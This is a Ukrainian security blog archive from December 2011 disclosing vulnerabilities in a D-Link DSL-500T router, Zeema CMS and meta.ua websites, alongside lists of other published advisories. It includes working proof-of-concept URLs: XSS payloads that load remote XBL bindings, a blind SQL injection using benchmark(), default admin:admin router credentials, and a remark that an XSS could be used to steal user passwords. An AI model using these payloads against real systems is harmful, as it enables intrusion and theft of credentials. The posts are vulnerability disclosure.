Архів для категорії 'Уразливості'

Добірка уразливостей

17:10 09.12.2011

В даній добірці уразливості в веб додатках:

Уразливості в D-Link DSL-500T ADSL Router

23:54 08.12.2011

У квітні, 24.04.2011, я виявив численні уразливості в ADSL модемі D-Link DSL-500T ADSL Router. Це Predictable Resource Location, Brute Force та Cross-Site Request Forgery уразливості. Це перший advisory з серії записів про уразливості в продуктах D-Link.

При цьому даний модем я використовую в офісі ще з жовтня 2005, тому по суті про PRL та BF уразливості мені відомо ще з тих пір, а вже стосовно CSRF я перевірив в квітні цього року. Коли почав досліджувати питання безпеки ADSL модемів (і різних роутерів та інших мережевих пристроїв), зокрема ADSL модема Callisto 821+, про численні уразливості в якому я вже розповідав. Дані три уразливості аналогічні діркам в Iskra Callisto 821+.

Predictable Resource Location:

http://192.168.1.1

Адмінка модема розміщується по дефолтному шляху з дефолтним логіном і паролем (admin:admin). Що дозволяє локальним користувачам (що мають доступ до ПК, або по LAN), а також віддаленим користувачам через Інтернет (через CSRF, в тому числі з використанням нищезгаданої CSRF атаки) отримувати доступ до адмінки і змінювати налаштування модема.

Дефолтні вищезгадані налаштування - це звичайна практика у виробників ADSL роутерів, але той же D-Link в нових своїх пристроях почав змінювати цю ситуацію, про що я розповім стосовно іншого пристрою цієї компанії. Але при цьому провайдери повинні вносити зміни, хоча той же Укртелеком цього не робить в модемах Callisto (що він надає своїм клієнтам). При цьому Інтертелеком, що надав нам в аренду цей DSL-500T, як раз змінив дефолтний пароль в адмінці.

Brute Force:

В формі логіна http://192.168.1.1 немає захисту від Brute Force атак. Що дозволить підбирати пароль (якщо він змінений з дефолтного), зокрема при локальній атаці. Наприклад, по LAN зловмисні користувачі або вірус на одному з комп’ютерів може провести атаку для підбору паролю, якщо він був змінений.

CSRF:

Відсутність захисту від Brute Force (такого як капча) також призводить до можливості проведення CSRF атаки, про що я писав в статті Атаки на незахищені логін форми. Це дозволяє проводити віддалений логін. Що стане в нагоді при проведенні атак на різні CSRF і XSS уразливості в панелі керування. Які цілком можуть бути в ній, що я можу сказати виходячи з уразливостей в іншому пристрої D-Link, який я купив в листопаді 2011, а також по діркам в Callisto 821+ (тому що дірки в адмінках модемів і роутерів дуже поширені).

Добірка уразливостей

16:26 08.12.2011

В даній добірці уразливості в веб додатках:

  • SAP RFC EPS_DELETE_FILE - Authorisation bypass, smbrelay (деталі)
  • Cross-Site Scripting vulnerability in Icinga (деталі)
  • SAP NetWeaver JavaMailExamples - XSS (деталі)
  • Cross-Site Scripting vulnerability in Nagios (деталі)
  • Multiple SQL Injections in A Really Simple Chat (ARSC) (деталі)
  • SAP NetWeaver ipcpricing - information disclose (деталі)
  • XSS in A Really Simple Chat (ARSC) (деталі)
  • Apache Archiva Multiple CSRF vulnerability (деталі)
  • Apache Archiva Multiple XSS vulnerability (деталі)
  • WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Commands Injection Vulnerability (деталі)

Нові уразливості на meta.ua

23:58 07.12.2011

Ще влітку 2007 року, 07.06.2007 та 08.07.2007, я знайшов Cross-Site Scripting уразливості на сайті http://meta.ua. Як я вже розповідав, після останнього разу, коли вони відповіли мені дуже несерйозним чином, я більше не сповіщаю Мету про дірки на їхніх сайтах.

Останнього разу стосовно проектів компанії Мета я писав про уразливості на zakon.meta.ua.

XSS:

Дані уразливості так досі й висять на сайті, як це було до того, як я знайшов їх у 2007 році (тобто на протязі всього часу роботи цього сайта). І це є типовим явищем для сайтів Мети, що добре видно з тих багатьох дірок на багатьох сайтах Мети про які я розповідав раніше.

XSS, SQLi та IL уразливості в Zeema CMS

17:28 07.12.2011

27.10.2011

У вересні, 12.09.2011, під час аудиту сайта свого клієнта, я знайшов Cross-Site Scripting, SQL Injection та Information Leakage уразливості в Zeema CMS (це українська комерційна CMS). Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в Zeema CMS. Це друга частина з великої кількості уразливостей знайдених в даній CMS. Про інші дірки я розповім згодом. Всім користувачам даної системи вельми рекомендується провести аудит безпеки власних сайтів.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб системи.

07.12.2011

Cross-Site Scripting:

http://site/counter/?act=ip&ip_addr=%3Cp%20style=-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml%23xss)%3E

Атака спрацює в браузерах Mozilla і Firefox.

SQL Injection:

http://site/counter/?act=ip&ip_addr=%27%20and%20benchmark(10000000,md5(now()))%23

Це blind SQL Injection.

Information Leakage:

Статистика сайта http://site/counter/ знаходиться в публічному доступі (і шлях до неї легко дізнатися).

Уразливі всі версії Zeema CMS.

Добірка уразливостей

17:03 06.12.2011

В даній добірці уразливості в веб додатках:

Уразливості на zakon.meta.ua

23:56 03.12.2011

У січні, 26.01.2008, я знайшов Cross-Site Scripting та Redirector уразливості на сайті http://zakon.meta.ua. Як я вже розповідав, після останнього разу, коли вони відповіли мені дуже несерйозним чином, я більше не сповіщаю Мету про дірки на їхніх сайтах.

Останнього разу стосовно проектів компанії Мета я писав про уразливість на passport.meta.ua.

XSS:

XSS (Strictly social XSS):

Redirector (URL Redirector Abuse):

http://zakon.meta.ua/law.asp?url=http://websecurity.com.ua

Про цей редиректор я вже писав в 2008 році.

Дані уразливості так досі й висять на сайті, як це було до того, як я знайшов їх у січні 2008 року (тобто на протязі всього часу роботи цього сайта). І це є типовим явищем для сайтів Мети, що добре видно з тих багатьох дірок на багатьох сайтах Мети про які я розповідав раніше.

Добірка уразливостей

17:29 03.12.2011

В даній добірці уразливості в веб додатках:

  • VMware vCenter Update Manager fix for Jetty Web server addresses directory traversal vulnerability (деталі)
  • XSS vulnerability in TWiki < 5.0.2 (деталі)
  • PHPCaptcha / Securimage 2.0.2 - Authentication Bypass (деталі)
  • Apache Struts 2, XWork, OpenSymphony WebWork Java Class Path Information Disclosure (деталі)
  • Session hacking via authentication cookie on Oracle CRM on Demand (деталі)
  • libmojolicious-perl security update (деталі)
  • 2WIRE-SINGTEL 2701HGV-E/2700HGV-2/2700HG GATEWAY ROUTER MANAGEMENT AND DIAGNOSTIC CONSOLE VULNERABILITY (деталі)
  • SQL injection in ExtCalendar 2 (деталі)
  • Multiple XSS in phpScheduleIt (деталі)
  • APPLE-SA-2011-11-10-1 iOS 5.0.1 Software Update (Apple iPhone) (деталі)

Уразливість на passport.meta.ua

23:53 02.12.2011

Ще у лиспопаді, 01.11.2006, я знайшов Cross-Site Scripting уразливість на сайті http://passport.meta.ua. Як я вже розповідав, після останнього разу, коли вони відповіли мені дуже несерйозним чином, я більше не сповіщаю Мету про дірки на їхніх сайтах.

Останнього разу стосовно проектів компанії Мета я писав про уразливості на tv.meta.ua.

XSS:

Дану уразливість вони вже виправили, одразу після моїх численних повідомлень про дірки на їхніх сайтах, як я вияснив ще в 2007 році (коли дійшов час до її оприлюднення). Але виправили вони неякісно, тому уразливість знову працює, при невеликій зміні коду.

XSS (з MouseOverJacking):

Дана уразливість так досі й висить на сайті, як це було до того, як я знайшов її у листопаді 2006 року (тобто на протязі всього часу роботи цього сайта). І це є типовим явищем для сайтів Мети, що добре видно з тих багатьох дірок на багатьох сайтах Мети про які я розповідав раніше.

Враховуючи, що уразливість на домені passport.meta.ua, де користувачі логіняться в свої акаунти, то її також можна використати для викрадання логінів та паролів користувачів даного портала. Що можна зробити як шляхом фішинга (включаючи on-site фішинг), так і шляхом XSS атаки на менеджери паролів в браузерах.

Уразливості в Zeema CMS

17:27 02.12.2011

22.10.2011

У вересні, 12.09.2011, під час аудиту сайта свого клієнта, я знайшов Brute Force, Cross-Site Scripting та Full path disclosure уразливості в Zeema CMS (це українська комерційна CMS). Про що найближчим часом повідомлю розробникам.

Це частина з великої кількості уразливостей знайдених в даній CMS. Про інші дірки я розповім згодом. Всім користувачам даної системи вельми рекомендується провести аудит безпеки власних сайтів.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб системи.

02.12.2011

Brute Force:

http://site/cms/

XSS:

http://site/search/?query=%22%20style=%22-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml%23xss)

Атака спрацює в браузерах Mozilla і Firefox.

Full path disclosure:

http://site/search/?page=10&query=site

Уразливі всі версії Zeema CMS.